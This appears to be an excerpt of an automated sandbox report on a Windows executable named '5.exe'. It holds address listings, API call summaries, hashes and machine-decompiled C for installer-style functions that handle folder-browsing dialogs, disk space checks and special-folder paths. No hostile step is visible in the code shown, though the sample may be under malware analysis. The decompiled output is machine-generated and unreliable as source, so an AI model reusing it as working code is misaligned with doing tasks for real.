                                                                                              0x00404919
                                                                                              0x00404919
                                                                                              0x0040491f
                                                                                              0x00404921
                                                                                              0x00404928
                                                                                              0x00404923
                                                                                              0x00404923
                                                                                              0x00404923
                                                                                              0x00404921
                                                                                              0x00404931
                                                                                              0x00404933
                                                                                              0x00404938
                                                                                              0x00404941
                                                                                              0x00404942
                                                                                              0x0040494c
                                                                                              0x0040494c
                                                                                              0x0040494e
                                                                                              0x00404951
                                                                                              0x00404951
                                                                                              0x00404912
                                                                                              0x00000000
                                                                                              0x004048ff
                                                                                              0x004048e3
                                                                                              0x004048e6
                                                                                              0x004048ea
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004048ea
                                                                                              0x004048c8
                                                                                              0x004048cf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004048b7
                                                                                              0x004048b7
                                                                                              0x004048ba
                                                                                              0x004049a7
                                                                                              0x004049a7
                                                                                              0x004049ae
                                                                                              0x00404a22
                                                                                              0x00404a22
                                                                                              0x00404a29
                                                                                              0x00404a35
                                                                                              0x00404a35
                                                                                              0x00404a37
                                                                                              0x00404a3e
                                                                                              0x00404a40
                                                                                              0x00404a45
                                                                                              0x00404a47
                                                                                              0x00404a4a
                                                                                              0x00404a4a
                                                                                              0x00404a50
                                                                                              0x00404a55
                                                                                              0x00404a57
                                                                                              0x00404a5a
                                                                                              0x00404a5a
                                                                                              0x00404a60
                                                                                              0x00404a66
                                                                                              0x00404a6c
                                                                                              0x00404a6c
                                                                                              0x00404a72
                                                                                              0x00404a79
                                                                                              0x00404bc6
                                                                                              0x00404bc6
                                                                                              0x00404bcd
                                                                                              0x00404bcf
                                                                                              0x00404bd6
                                                                                              0x00404bda
                                                                                              0x00404be7
                                                                                              0x00404be7
                                                                                              0x00404bea
                                                                                              0x00404bf0
                                                                                              0x00404c02
                                                                                              0x00404c02
                                                                                              0x00404bd6
                                                                                              0x00000000
                                                                                              0x00404a7f
                                                                                              0x00404a81
                                                                                              0x00404a86
                                                                                              0x00404a89
                                                                                              0x00404a8d
                                                                                              0x00404a8d
                                                                                              0x00404a92
                                                                                              0x00404a95
                                                                                              0x00404ad6
                                                                                              0x00404ad8
                                                                                              0x00404ae2
                                                                                              0x00404ae8
                                                                                              0x00404aeb
                                                                                              0x00404af0
                                                                                              0x00404af7
                                                                                              0x00404afa
                                                                                              0x00404b9c
                                                                                              0x00404ba2
                                                                                              0x00404ba8
                                                                                              0x00404bad
                                                                                              0x00404bb0
                                                                                              0x00404bc1
                                                                                              0x00404bc1
                                                                                              0x00000000
                                                                                              0x00404b00
                                                                                              0x00404b00
                                                                                              0x00404b00
                                                                                              0x00404b03
                                                                                              0x00404b09
                                                                                              0x00404b0c
                                                                                              0x00404b0e
                                                                                              0x00404b10
                                                                                              0x00404b12
                                                                                              0x00404b15
                                                                                              0x00404b18
                                                                                              0x00404b1f
                                                                                              0x00404b21
                                                                                              0x00404b24
                                                                                              0x00404b2b
                                                                                              0x00404b2e
                                                                                              0x00404b2e
                                                                                              0x00404b2e
                                                                                              0x00404b2e
                                                                                              0x00404b32
                                                                                              0x00404b35
                                                                                              0x00404b41
                                                                                              0x00404b42
                                                                                              0x00404b45
                                                                                              0x00404b47
                                                                                              0x00404b47
                                                                                              0x00404b47
                                                                                              0x00404b37
                                                                                              0x00404b39
                                                                                              0x00404b39
                                                                                              0x00404b66
                                                                                              0x00404b66
                                                                                              0x00404b67
                                                                                              0x00404b73
                                                                                              0x00404b82
                                                                                              0x00404b82
                                                                                              0x00404b84
                                                                                              0x00404b87
                                                                                              0x00404b90
                                                                                              0x00404b90
                                                                                              0x00000000
                                                                                              0x00404b03
                                                                                              0x00404a97
                                                                                              0x00404aa2
                                                                                              0x00404aa5
                                                                                              0x00404aaa
                                                                                              0x00404aac
                                                                                              0x00404aae
                                                                                              0x00404ab0
                                                                                              0x00404ac0
                                                                                              0x00404aca
                                                                                              0x00404acc
                                                                                              0x00404acf
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404ab2
                                                                                              0x00404ab2
                                                                                              0x00404ab2
                                                                                              0x00404ab5
                                                                                              0x00404ab8
                                                                                              0x00404aba
                                                                                              0x00404aba
                                                                                              0x00404aba
                                                                                              0x00404abb
                                                                                              0x00404abc
                                                                                              0x00404abc
                                                                                              0x00000000
                                                                                              0x00404ab2
                                                                                              0x00404a95
                                                                                              0x00404a79
                                                                                              0x004049b0
                                                                                              0x004049b6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004049c2
                                                                                              0x004049c6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004049d6
                                                                                              0x004049d8
                                                                                              0x004049db
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004049ed
                                                                                              0x004049ef
                                                                                              0x004049f2
                                                                                              0x004049fc
                                                                                              0x004049fe
                                                                                              0x004049ff
                                                                                              0x00404a00
                                                                                              0x00404a0f
                                                                                              0x00404a11
                                                                                              0x00404a18
                                                                                              0x00404a1b
                                                                                              0x00000000
                                                                                              0x00404a1b
                                                                                              0x004049f4
                                                                                              0x004049f7
                                                                                              0x004049fa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004049fa
                                                                                              0x00000000
                                                                                              0x004048ba
                                                                                              0x0040466c
                                                                                              0x00404671
                                                                                              0x00404676
                                                                                              0x0040467b
                                                                                              0x0040467c
                                                                                              0x00404685
                                                                                              0x00404690
                                                                                              0x0040469b
                                                                                              0x004046a1
                                                                                              0x004046af
                                                                                              0x004046c4
                                                                                              0x004046c9
                                                                                              0x004046d4
                                                                                              0x004046dd
                                                                                              0x004046f2
                                                                                              0x00404703
                                                                                              0x00404710
                                                                                              0x00404710
                                                                                              0x00404715
                                                                                              0x0040471b
                                                                                              0x0040471d
                                                                                              0x00404720
                                                                                              0x00404725
                                                                                              0x0040472a
                                                                                              0x0040472c
                                                                                              0x0040472c
                                                                                              0x0040474c
                                                                                              0x0040474c
                                                                                              0x0040474e
                                                                                              0x0040474f
                                                                                              0x00404754
                                                                                              0x00404757
                                                                                              0x0040475a
                                                                                              0x0040475e
                                                                                              0x00404763
                                                                                              0x00404768
                                                                                              0x0040476c
                                                                                              0x00404771
                                                                                              0x00404776
                                                                                              0x00404778
                                                                                              0x0040477a
                                                                                              0x00404780
                                                                                              0x0040484a
                                                                                              0x0040485d
                                                                                              0x00000000
                                                                                              0x00404786
                                                                                              0x00404789
                                                                                              0x0040478c
                                                                                              0x0040478f
                                                                                              0x0040478f
                                                                                              0x00404795
                                                                                              0x0040479b
                                                                                              0x0040479e
                                                                                              0x004047a4
                                                                                              0x004047a5
                                                                                              0x004047aa
                                                                                              0x004047b3
                                                                                              0x004047ba
                                                                                              0x004047bd
                                                                                              0x004047c0
                                                                                              0x004047c3
                                                                                              0x004047fd
                                                                                              0x004047ff
                                                                                              0x00404828
                                                                                              0x00404801
                                                                                              0x0040480e
                                                                                              0x0040480e
                                                                                              0x004047c5
                                                                                              0x004047c8
                                                                                              0x004047d7
                                                                                              0x004047e1
                                                                                              0x004047e9
                                                                                              0x004047f0
                                                                                              0x004047f8
                                                                                              0x004047f8
                                                                                              0x004047c3
                                                                                              0x0040482e
                                                                                              0x0040482f
                                                                                              0x00404835
                                                                                              0x0040483b
                                                                                              0x0040483b
                                                                                              0x00404848
                                                                                              0x00404863
                                                                                              0x00404867
                                                                                              0x00404884
                                                                                              0x00404889
                                                                                              0x0040488c
                                                                                              0x0040488c
                                                                                              0x00000000
                                                                                              0x00404869
                                                                                              0x0040486e
                                                                                              0x00404877
                                                                                              0x00404c04
                                                                                              0x00404c16
                                                                                              0x00404c16
                                                                                              0x00404867
                                                                                              0x00000000
                                                                                              0x00404848
                                                                                              0x00404780

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                                                              • String ID: $M$N$`Ae
                                                                                              • API String ID: 1638840714-4108015562
                                                                                              • Opcode ID: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                                                              • Instruction ID: c130209c976f96ebc92895edf0e38420b46f59adec9cf70198d20430cf8fc3c6
                                                                                              • Opcode Fuzzy Hash: f6787f79de443932d2fc7b26f3aa5085de6bf6d711a4170b7836f229e80d056d
                                                                                              • Instruction Fuzzy Hash: 1E02AEB0A00209AFDB20DF95DD45AAE7BB5FB84314F10817AF611BA2E1C7789D42CF58
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040411B, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 266stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 78%
                                                                                              			E0040411B(struct HWND__* _a4, signed int _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				struct HWND__* _v12;
				long _v16;
				long _v20;
				char _v24;
				long _v28;
				char _v32;
				intOrPtr _v36;
				long _v40;
				signed int _v44;
				CHAR* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				CHAR* _v68;
				void _v72;
				char _v76;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t81;
				long _t86;
				signed char* _t88;
				void* _t94;
				signed int _t95;
				signed short _t113;
				signed int _t117;
				char* _t122;
				intOrPtr _t124;
				intOrPtr* _t138;
				signed int* _t145;
				intOrPtr _t147;
				signed int _t148;
				signed int _t153;
				struct HWND__* _t159;
				CHAR* _t162;
				int _t163;

				_t81 =  *0x4297a8;
				_v36 = _t81;
				_t162 = ( *(_t81 + 0x3c) << 0xa) + 0x42f000;
				_v8 =  *((intOrPtr*)(_t81 + 0x38));
				if(_a8 == 0x40b) {
					E004051D0(0x3fb, _t162);
					E00405B89(_t162);
				}
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E004051D0(0x3fb, _t162);
							if(E004054FF(_t180, _t162) == 0) {
								_v8 = 1;
							}
							E0040592B(0x428fa0, _t162);
							_t145 = 0;
							_t86 = E00405C49(0);
							_v16 = _t86;
							if(_t86 == 0) {
								L31:
								E0040592B(0x428fa0, _t162);
								_t88 = E004054B2(0x428fa0);
								if(_t88 != _t145) {
									 *_t88 =  *_t88 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x428fa0,  &_v20,  &_v28,  &_v16,  &_v40) == 0) {
									_t153 = _a8;
									goto L37;
								} else {
									_t163 = 0x400;
									_t153 = MulDiv(_v20 * _v28, _v16, 0x400);
									_v12 = 1;
									goto L38;
								}
							} else {
								if(0 == 0x428fa0) {
									L30:
									_t145 = 0;
									goto L31;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t113 = _v16(0x428fa0,  &_v44,  &_v24,  &_v32);
									if(_t113 != 0) {
										break;
									}
									if(_t145 != 0) {
										 *_t145 =  *_t145 & _t113;
									}
									_t145 = E00405465(0x428fa0) - 1;
									 *_t145 = 0x5c;
									if(_t145 != 0x428fa0) {
										continue;
									} else {
										goto L30;
									}
								}
								_t153 = (_v40 << 0x00000020 | _v44) >> 0xa;
								_v12 = 1;
								_t145 = 0;
								L37:
								_t163 = 0x400;
								L38:
								_t94 = E0040456B(5);
								if(_v12 != _t145 && _t153 < _t94) {
									_v8 = 2;
								}
								_t147 =  *0x42e33c; // 0x65aa00
								if( *((intOrPtr*)(_t147 + 0x10)) != _t145) {
									E004044B6(0x3ff, 0xfffffffb, _t94);
									if(_v12 == _t145) {
										SetDlgItemTextA(_a4, _t163, 0x428f90);
									} else {
										E004044B6(_t163, 0xfffffffc, _t153);
									}
								}
								_t95 = _v8;
								 *0x42ec04 = _t95;
								if(_t95 == _t145) {
									_v8 = E0040140B(7);
								}
								if(( *(_v36 + 0x14) & _t163) != 0) {
									_v8 = _t145;
								}
								E00403CFF(0 | _v8 == _t145);
								if(_v8 == _t145 &&  *0x429fc4 == _t145) {
									E004040B0();
								}
								 *0x429fc4 = _t145;
								goto L53;
							}
						}
						_t180 = _a8 - 0x405;
						if(_a8 != 0x405) {
							goto L53;
						}
						goto L22;
					}
					_t117 = _a12 & 0x0000ffff;
					if(_t117 != 0x3fb) {
						L12:
						if(_t117 == 0x3e9) {
							_t148 = 7;
							memset( &_v72, 0, _t148 << 2);
							_v76 = _a4;
							_v68 = 0x429fd8;
							_v56 = E00404450;
							_v52 = _t162;
							_v64 = E0040594D(0x3fb, 0x429fd8, _t162, 0x4293a8, _v8);
							_t122 =  &_v76;
							_v60 = 0x41;
							__imp__SHBrowseForFolderA(_t122);
							if(_t122 == 0) {
								_a8 = 0x40f;
							} else {
								__imp__CoTaskMemFree(_t122);
								E0040541E(_t162);
								_t124 =  *0x42eb70; // 0x654160
								_t125 =  *((intOrPtr*)(_t124 + 0x11c));
								if( *((intOrPtr*)(_t124 + 0x11c)) != 0 && _t162 == "C:\\Users\\alfons\\AppData\\Local\\Temp") {
									E0040594D(0x3fb, 0x429fd8, _t162, 0, _t125);
									if(lstrcmpiA(0x42db00, 0x429fd8) != 0) {
										lstrcatA(_t162, 0x42db00);
									}
								}
								 *0x429fc4 =  &(( *0x429fc4)[0]);
								SetDlgItemTextA(_a4, 0x3fb, _t162);
							}
						}
						goto L20;
					}
					if(_a12 >> 0x10 != 0x300) {
						goto L53;
					}
					_a8 = 0x40f;
					goto L12;
				} else {
					_t159 = _a4;
					_v12 = GetDlgItem(_t159, 0x3fb);
					if(E0040548B(_t162) != 0 && E004054B2(_t162) == 0) {
						E0040541E(_t162);
					}
					 *0x42e338 = _t159;
					SetWindowTextA(_v12, _t162);
					_push( *((intOrPtr*)(_a16 + 0x34)));
					_push(1);
					E00403CDD(_t159);
					_push( *((intOrPtr*)(_a16 + 0x30)));
					_push(0x14);
					E00403CDD(_t159);
					E00403D12(_v12);
					_t138 = E00405C49(7);
					if(_t138 == 0) {
						L53:
						return E00403D44(_a8, _a12, _a16);
					}
					 *_t138(_v12, 1);
					goto L8;
				}
			}








































                                                                                              0x00404121
                                                                                              0x00404128
                                                                                              0x00404134
                                                                                              0x00404142
                                                                                              0x0040414a
                                                                                              0x0040414e
                                                                                              0x00404154
                                                                                              0x00404154
                                                                                              0x00404160
                                                                                              0x004041d4
                                                                                              0x004041db
                                                                                              0x004042b0
                                                                                              0x004042b7
                                                                                              0x004042c6
                                                                                              0x004042c6
                                                                                              0x004042ca
                                                                                              0x004042d0
                                                                                              0x004042dd
                                                                                              0x004042df
                                                                                              0x004042df
                                                                                              0x004042ed
                                                                                              0x004042f2
                                                                                              0x004042f5
                                                                                              0x004042fc
                                                                                              0x004042ff
                                                                                              0x00404336
                                                                                              0x00404338
                                                                                              0x0040433e
                                                                                              0x00404345
                                                                                              0x00404347
                                                                                              0x00404347
                                                                                              0x00404363
                                                                                              0x0040439f
                                                                                              0x00000000
                                                                                              0x00404365
                                                                                              0x00404368
                                                                                              0x0040437c
                                                                                              0x0040437e
                                                                                              0x00000000
                                                                                              0x0040437e
                                                                                              0x00404301
                                                                                              0x00404305
                                                                                              0x00404334
                                                                                              0x00404334
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404307
                                                                                              0x00404307
                                                                                              0x00404314
                                                                                              0x00404319
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040431d
                                                                                              0x0040431f
                                                                                              0x0040431f
                                                                                              0x0040432a
                                                                                              0x0040432d
                                                                                              0x00404332
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00404332
                                                                                              0x0040438d
                                                                                              0x00404394
                                                                                              0x0040439b
                                                                                              0x004043a2
                                                                                              0x004043a2
                                                                                              0x004043a7
                                                                                              0x004043a9
                                                                                              0x004043b1
                                                                                              0x004043b7
                                                                                              0x004043b7
                                                                                              0x004043be
                                                                                              0x004043c7
                                                                                              0x004043d1
                                                                                              0x004043d9
                                                                                              0x004043ef
                                                                                              0x004043db
                                                                                              0x004043df
                                                                                              0x004043df
                                                                                              0x004043d9
                                                                                              0x004043f4
                                                                                              0x004043f9
                                                                                              0x004043fe
                                                                                              0x00404407
                                                                                              0x00404407
                                                                                              0x00404410
                                                                                              0x00404412
                                                                                              0x00404412
                                                                                              0x0040441e
                                                                                              0x00404426
                                                                                              0x00404430
                                                                                              0x00404430
                                                                                              0x00404435
                                                                                              0x00000000
                                                                                              0x00404435
                                                                                              0x004042ff
                                                                                              0x004042b9
                                                                                              0x004042c0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004042c0
                                                                                              0x004041e1
                                                                                              0x004041e7
                                                                                              0x00404201
                                                                                              0x00404206
                                                                                              0x00404210
                                                                                              0x00404217
                                                                                              0x00404226
                                                                                              0x00404229
                                                                                              0x0040422c
                                                                                              0x00404233
                                                                                              0x0040423b
                                                                                              0x0040423e
                                                                                              0x00404242
                                                                                              0x00404249
                                                                                              0x00404251
                                                                                              0x004042a9
                                                                                              0x00404253
                                                                                              0x00404254
                                                                                              0x0040425b
                                                                                              0x00404260
                                                                                              0x00404265
                                                                                              0x0040426d
                                                                                              0x0040427a
                                                                                              0x0040428e
                                                                                              0x00404292
                                                                                              0x00404292
                                                                                              0x0040428e
                                                                                              0x00404297
                                                                                              0x004042a2
                                                                                              0x004042a2
                                                                                              0x00404251
                                                                                              0x00000000
                                                                                              0x00404206
                                                                                              0x004041f4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004041fa
                                                                                              0x00000000
                                                                                              0x00404162
                                                                                              0x00404162
                                                                                              0x0040416e
                                                                                              0x00404178
                                                                                              0x00404185
                                                                                              0x00404185
                                                                                              0x0040418b
                                                                                              0x00404194
                                                                                              0x0040419d
                                                                                              0x004041a0
                                                                                              0x004041a3
                                                                                              0x004041ab
                                                                                              0x004041ae
                                                                                              0x004041b1
                                                                                              0x004041b9
                                                                                              0x004041c0
                                                                                              0x004041c7
                                                                                              0x0040443b
                                                                                              0x0040444d
                                                                                              0x0040444d
                                                                                              0x004041d2
                                                                                              0x00000000
                                                                                              0x004041d2

                                                                                              APIs
                                                                                              • GetDlgItem.USER32 ref: 00404167
                                                                                              • SetWindowTextA.USER32(?,?), ref: 00404194
                                                                                              • SHBrowseForFolderA.SHELL32(?,004293A8,?), ref: 00404249
                                                                                              • CoTaskMemFree.OLE32(00000000), ref: 00404254
                                                                                              • lstrcmpiA.KERNEL32(ivvzb,00429FD8,00000000,?,?), ref: 00404286
                                                                                              • lstrcatA.KERNEL32(?,ivvzb), ref: 00404292
                                                                                              • SetDlgItemTextA.USER32 ref: 004042A2
                                                                                                • Part of subcall function 004051D0: GetDlgItemTextA.USER32 ref: 004051E3
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BE1
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,?,?,00000000), ref: 00405BEE
                                                                                                • Part of subcall function 00405B89: CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405BF3
                                                                                                • Part of subcall function 00405B89: CharPrevA.USER32(?,?,"C:\Users\user\Desktop\5.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004030BB,C:\Users\user\AppData\Local\Temp\,00000000,0040322D), ref: 00405C03
                                                                                              • GetDiskFreeSpaceA.KERNEL32(00428FA0,?,?,0000040F,?,00428FA0,00428FA0,?,00000000,00428FA0,?,?,000003FB,?), ref: 0040435B
                                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404376
                                                                                              • SetDlgItemTextA.USER32 ref: 004043EF
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000001.00000002.266522069.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000001.00000002.266472405.0000000000400000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266547740.0000000000407000.00000002.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266618310.0000000000409000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266945973.000000000042C000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266962267.0000000000434000.00000004.00020000.sdmp Download File
                                                                                              • Associated: 00000001.00000002.266984299.0000000000437000.00000002.00020000.sdmp Download File
                                                                                              Similarity
                                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                                                              • String ID: A$C:\Users\user\AppData\Local\Temp$`Ae$ivvzb
                                                                                              • API String ID: 2246997448-1835872293
                                                                                              • Opcode ID: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                                                              • Instruction ID: a19ed3a57cd3ea7516059bd6de19f3cb3834a8abb31794935fb739ca8bc8323d
                                                                                              • Opcode Fuzzy Hash: 5b9bdf223cbd0333478b7b1187abfe1a1a1fc831b9bc42824364c4c8eca1df57
                                                                                              • Instruction Fuzzy Hash: E09151B1A00218ABDB11DFA1DD85AEF7BB8EF84315F10407BFA04B62D1D77C99418B69
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040594D, Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 195stringCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 74%
                                                                                              			E0040594D(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8) {
				signed int _v8;
				struct _ITEMIDLIST* _v12;
				signed int _v16;
				signed char _v20;
				signed char _v24;
				signed int _v28;
				signed int _t36;
				CHAR* _t37;
				signed char _t39;
				signed int _t40;
				int _t41;
				char _t51;
				char _t52;
				char _t54;
				char _t56;
				void* _t64;
				signed int _t68;
				intOrPtr _t72;
				signed int _t73;
				signed char _t74;
				intOrPtr _t77;
				char _t81;
				void* _t83;
				CHAR* _t84;
				void* _t86;
				signed int _t93;
				signed int _t95;
				void* _t96;

				_t86 = __esi;
				_t83 = __edi;
				_t64 = __ebx;
				_t36 = _a8;
				if(_t36 < 0) {
					_t77 =  *0x42e33c; // 0x65aa00
					_t36 =  *(_t77 - 4 + _t36 * 4);
				}
				_t72 =  *0x42eb98; // 0x6590c0
				_t73 = _t72 + _t36;
				_t37 = 0x42db00;
				_push(_t64);
				_push(_t86);
				_push(_t83);
				_t84 = 0x42db00;
				if(_a4 - 0x42db00 < 0x800) {
					_t84 = _a4;
					_a4 = _a4 & 0x00000000;
				}
				while(1) {
					_t81 =  *_t73;
					if(_t81 == 0) {
						break;
					}
					__eflags = _t84 - _t37 - 0x400;
					if(_t84 - _t37 >= 0x400) {
						break;
					}
					_t73 = _t73 + 1;
					__eflags = _t81 - 0xfc;
					_a8 = _t73;
					if(__eflags <= 0) {
						if(__eflags != 0) {
							 *_t84 = _t81;
							_t84 =  &(_t84[1]);
							__eflags = _t84;
						} else {
							 *_t84 =  *_t73;
							_t84 =  &(_t84[1]);
							_t73 = _t73 + 1;
						}
						continue;
					}
					_t39 =  *(_t73 + 1);
					_t74 =  *_t73;
					_a8 = _a8 + 2;
					_v20 = _t39;
					_t93 = (_t39 & 0x0000007f) << 0x00000007 | _t74 & 0x0000007f;
					_t68 = _t74;
					_t40 = _t39 | 0x00000080;
					__eflags = _t81 - 0xfe;
					_v28 = _t68;
					_v24 = _t74 | 0x00000080;
					_v16 = _t40;
					if(_t81 != 0xfe) {
						__eflags = _t81 - 0xfd;
						if(_t81 != 0xfd) {
							__eflags = _t81 - 0xff;
							if(_t81 == 0xff) {
								__eflags = (_t40 | 0xffffffff) - _t93;
								E0040594D(_t68, _t84, _t93, _t84, (_t40 | 0xffffffff) - _t93);
							}
							L41:
							_t41 = lstrlenA(_t84);
							_t73 = _a8;
							_t84 =  &(_t84[_t41]);
							_t37 = 0x42db00;
							continue;
						}
						__eflags = _t93 - 0x1d;
						if(_t93 != 0x1d) {
							__eflags = (_t93 << 0xa) + 0x42f000;
							E0040592B(_t84, (_t93 << 0xa) + 0x42f000);
						} else {
							E00405889(_t84,  *0x42eb68);
						}
						__eflags = _t93 + 0xffffffeb - 7;
						if(_t93 + 0xffffffeb < 7) {
							L32:
							E00405B89(_t84);
						}
						goto L41;
					}
					_t95 = 2;
					_t51 = GetVersion();
					__eflags = _t51;
					if(_t51 >= 0) {
						L12:
						_v8 = 1;
						L13:
						__eflags =  *0x42ebe4;
						if( *0x42ebe4 != 0) {
							_t95 = 4;
						}
						__eflags = _t68;
						if(_t68 >= 0) {
							__eflags = _t68 - 0x25;
							if(_t68 != 0x25) {
								__eflags = _t68 - 0x24;
								if(_t68 == 0x24) {
									GetWindowsDirectoryA(_t84, 0x400);
									_t95 = 0;
								}
								while(1) {
									__eflags = _t95;
									if(_t95 == 0) {
										goto L29;
									}
									_t52 =  *0x42eb64; // 0x74261340
									_t95 = _t95 - 1;
									__eflags = _t52;
									if(_t52 == 0) {
										L25:
										_t54 = SHGetSpecialFolderLocation( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18),  &_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											L27:
											 *_t84 =  *_t84 & 0x00000000;
											__eflags =  *_t84;
											continue;
										}
										__imp__SHGetPathFromIDListA(_v12, _t84);
										__imp__CoTaskMemFree(_v12);
										__eflags = _t54;
										if(_t54 != 0) {
											goto L29;
										}
										goto L27;
									}
									__eflags = _v8;
									if(_v8 == 0) {
										goto L25;
									}
									_t56 =  *_t52( *0x42eb68,  *(_t96 + _t95 * 4 - 0x18), 0, 0, _t84);
									__eflags = _t56;
									if(_t56 == 0) {
										goto L29;
									}
									goto L25;
								}
								goto L29;
							}
							GetSystemDirectoryA(_t84, 0x400);
							goto L29;
						} else {
							_t71 = (_t68 & 0x0000003f) +  *0x42eb98;
							E00405812(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion", (_t68 & 0x0000003f) +  *0x42eb98, _t84, _t68 & 0x00000040);
							__eflags =  *_t84;
							if( *_t84 != 0) {
								L30:
								__eflags = _v20 - 0x1a;
								if(_v20 == 0x1a) {
									lstrcatA(_t84, "\\Microsoft\\Internet Explorer\\Quick Launch");
								}
								goto L32;
							}
							E0040594D(_t71, _t84, _t95, _t84, _v20);
							L29:
							__eflags =  *_t84;
							if( *_t84 == 0) {
								goto L32;
							}
							goto L30;
						}
					}
					__eflags = _t51 - 0x5a04;
					if(_t51 == 0x5a04) {
						goto L12;
					}
					__eflags = _v20 - 0x23;
					if(_v20 == 0x23) {
						goto L12;
					}
					__eflags = _v20 - 0x2e;
					if(_v20 == 0x2e) {
						goto L12;
					} else {
						_v8 = _v8 & 0x00000000;
						goto L13;
					}
				}
				 *_t84 =  *_t84 & 0x00000000;
				if(_a4 == 0) {
					return _t37;
				}
				return E0040592B(_a4, _t37);
			}































                                                                                              0x0040594d
                                                                                              0x0040594d
                                                                                              0x0040594d
                                                                                              0x00405953
                                                                                              0x00405958
                                                                                              0x0040595a
                                                                                              0x00405969
                                                                                              0x00405969
                                                                                              0x0040596b
                                                                                              0x00405974
                                                                                              0x00405976
                                                                                              0x0040597b
                                                                                              0x0040597e
                                                                                              0x0040597f
                                                                                              0x00405986
                                                                                              0x00405988
                                                                                              0x0040598e
                                                                                              0x00405991
                                                                                              0x00405991
                                                                                              0x00405b66
                                                                                              0x00405b66
                                                                                              0x00405b6a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040599e
                                                                                              0x004059a4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x004059aa
                                                                                              0x004059ab
                                                                                              0x004059ae
                                                                                              0x004059b1
                                                                                              0x00405b59
                                                                                              0x00405b63
                                                                                              0x00405b65
                                                                                              0x00405b65
                                                                                              0x00405b5b
                                                                                              0x00405b5d
                                                                                              0x00405b5f
                                                                                              0x00405b60
                                                                                              0x00405b60
                                                                                              0x00000000
                                                                                              0x00405b59
                                                                                              0x004059b7
                                                                                              0x004059bb
                                                                                              0x004059c0
                                                                                              0x004059cf
                                                                                              0x004059d2
                                                                                              0x004059d4
                                                                                              0x004059d9
                                                                                              0x004059dc
                                                                                              0x004059df
                                                                                              0x004059e2
                                                                                              0x004059e5
                                                                                              0x004059e8
                                                                                              0x00405b03
                                                                                              0x00405b06
                                                                                              0x00405b36
                                                                                              0x00405b39
                                                                                              0x00405b3e
                                                                                              0x00405b42
                                                                                              0x00405b42
                                                                                              0x00405b47
                                                                                              0x00405b48
